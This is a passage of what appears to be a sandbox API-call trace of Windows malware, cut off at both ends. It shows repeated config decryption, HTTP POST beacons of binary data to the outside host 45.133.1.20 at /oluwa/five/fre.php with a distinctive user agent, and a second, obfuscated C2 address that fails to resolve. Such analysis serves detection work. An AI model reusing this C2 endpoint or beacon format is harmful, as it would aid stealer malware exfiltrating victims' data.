lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0274.234] GetProcessHeap () returned 0x6a0000 [0274.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0274.235] GetProcessHeap () returned 0x6a0000 [0274.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0274.235] GetProcessHeap () returned 0x6a0000 [0274.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0274.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.238] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.246] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0274.256] GetProcessHeap () returned 0x6a0000 [0274.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0274.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.259] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0274.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.261] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.262] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.262] GetProcessHeap () returned 0x6a0000 [0274.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0274.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.264] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0274.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.265] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0274.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.266] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0274.266] GetProcessHeap () returned 0x6a0000 [0274.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0274.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.268] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0274.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.269] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0274.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.270] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0274.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.272] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0274.272] GetProcessHeap () returned 0x6a0000 [0274.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0274.272] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0274.272] GetProcessHeap () returned 0x6a0000 [0274.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0274.272] socket (af=2, type=1, protocol=6) returned 0x9c4 [0274.273] connect (s=0x9c4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0274.297] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0274.297] GetProcessHeap () returned 0x6a0000 [0274.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0274.297] GetProcessHeap () returned 0x6a0000 [0274.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0274.298] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0274.299] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0274.300] GetProcessHeap () returned 0x6a0000 [0274.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0274.300] GetProcessHeap () returned 0x6a0000 [0274.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0274.301] GetProcessHeap () returned 0x6a0000 [0274.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0274.301] GetProcessHeap () returned 0x6a0000 [0274.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0274.302] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0274.305] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0274.305] GetProcessHeap () returned 0x6a0000 [0274.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0274.305] GetProcessHeap () returned 0x6a0000 [0274.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0274.306] send (s=0x9c4, buf=0x6bd460*, len=242, flags=0) returned 242 [0274.306] send (s=0x9c4, buf=0x6bb998*, len=159, flags=0) returned 159 [0274.307] GetProcessHeap () returned 0x6a0000 [0274.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0274.307] recv (in: s=0x9c4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0274.388] GetProcessHeap () returned 0x6a0000 [0274.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0274.389] GetProcessHeap () returned 0x6a0000 [0274.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0274.389] GetProcessHeap () returned 0x6a0000 [0274.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0274.390] GetProcessHeap () returned 0x6a0000 [0274.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0274.391] closesocket (s=0x9c4) returned 0 [0274.391] GetProcessHeap () returned 0x6a0000 [0274.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0274.391] GetProcessHeap () returned 0x6a0000 [0274.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0274.392] GetProcessHeap () returned 0x6a0000 [0274.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0274.393] GetProcessHeap () returned 0x6a0000 [0274.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0274.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1758) returned 0x9c4 [0274.395] Sleep (dwMilliseconds=0xea60) [0274.397] GetProcessHeap () returned 0x6a0000 [0274.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0274.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.399] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.415] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0274.427] GetProcessHeap () returned 0x6a0000 [0274.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da460 [0274.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.429] CryptImportKey (in: hProv=0x6beb90, pbData=0x6da460, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0274.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.430] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.437] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.437] GetProcessHeap () returned 0x6a0000 [0274.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da460 | out: hHeap=0x6a0000) returned 1 [0274.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.439] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0274.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.440] CryptDestroyKey (hKey=0x6ad520) returned 1 [0274.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.441] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0274.441] GetProcessHeap () returned 0x6a0000 [0274.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0274.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.443] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.444] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.448] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.449] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.449] GetProcessHeap () returned 0x6a0000 [0274.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0274.449] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0274.450] GetProcessHeap () returned 0x6a0000 [0274.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0274.450] GetProcessHeap () returned 0x6a0000 [0274.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0274.451] GetProcessHeap () returned 0x6a0000 [0274.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0274.451] GetProcessHeap () returned 0x6a0000 [0274.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0274.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.452] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0274.499] GetProcessHeap () returned 0x6a0000 [0274.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0274.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.501] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0274.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.502] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.506] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.506] GetProcessHeap () returned 0x6a0000 [0274.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0274.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.526] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0274.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.528] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0274.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.529] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0274.529] GetProcessHeap () returned 0x6a0000 [0274.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0274.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.532] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0274.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.534] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0274.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.535] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0274.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.536] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0274.536] GetProcessHeap () returned 0x6a0000 [0274.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0274.536] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0274.536] GetProcessHeap () returned 0x6a0000 [0274.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0274.537] socket (af=2, type=1, protocol=6) returned 0x9c8 [0274.537] connect (s=0x9c8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0274.566] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0274.566] GetProcessHeap () returned 0x6a0000 [0274.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0274.566] GetProcessHeap () returned 0x6a0000 [0274.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0274.567] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0274.568] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0274.568] GetProcessHeap () returned 0x6a0000 [0274.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9cf0 [0274.568] GetProcessHeap () returned 0x6a0000 [0274.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0274.568] GetProcessHeap () returned 0x6a0000 [0274.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0274.569] GetProcessHeap () returned 0x6a0000 [0274.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0274.569] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0274.570] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0274.570] GetProcessHeap () returned 0x6a0000 [0274.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0274.570] GetProcessHeap () returned 0x6a0000 [0274.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0274.571] send (s=0x9c8, buf=0x6bd460*, len=242, flags=0) returned 242 [0274.572] send (s=0x9c8, buf=0x6bb998*, len=159, flags=0) returned 159 [0274.572] GetProcessHeap () returned 0x6a0000 [0274.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0274.572] recv (in: s=0x9c8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0274.646] GetProcessHeap () returned 0x6a0000 [0274.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0274.647] GetProcessHeap () returned 0x6a0000 [0274.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0274.647] GetProcessHeap () returned 0x6a0000 [0274.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9cf0 | out: hHeap=0x6a0000) returned 1 [0274.647] GetProcessHeap () returned 0x6a0000 [0274.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0274.647] closesocket (s=0x9c8) returned 0 [0274.649] GetProcessHeap () returned 0x6a0000 [0274.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0274.649] GetProcessHeap () returned 0x6a0000 [0274.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0274.649] GetProcessHeap () returned 0x6a0000 [0274.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0274.650] GetProcessHeap () returned 0x6a0000 [0274.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0274.650] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x175c) returned 0x9c8 [0274.653] Sleep (dwMilliseconds=0xea60) [0274.655] GetProcessHeap () returned 0x6a0000 [0274.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0274.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.656] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.664] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0274.672] GetProcessHeap () returned 0x6a0000 [0274.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0274.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.673] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0274.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.674] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.675] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.675] GetProcessHeap () returned 0x6a0000 [0274.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0274.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.799] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0274.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.800] CryptDestroyKey (hKey=0x6ad560) returned 1 [0274.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.800] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0274.800] GetProcessHeap () returned 0x6a0000 [0274.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0274.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.802] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.802] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.803] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.804] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.804] GetProcessHeap () returned 0x6a0000 [0274.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0274.805] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0274.807] GetProcessHeap () returned 0x6a0000 [0274.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0274.807] GetProcessHeap () returned 0x6a0000 [0274.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0274.808] GetProcessHeap () returned 0x6a0000 [0274.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0274.808] GetProcessHeap () returned 0x6a0000 [0274.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0274.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.809] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.820] CryptAcquireContextW (in: 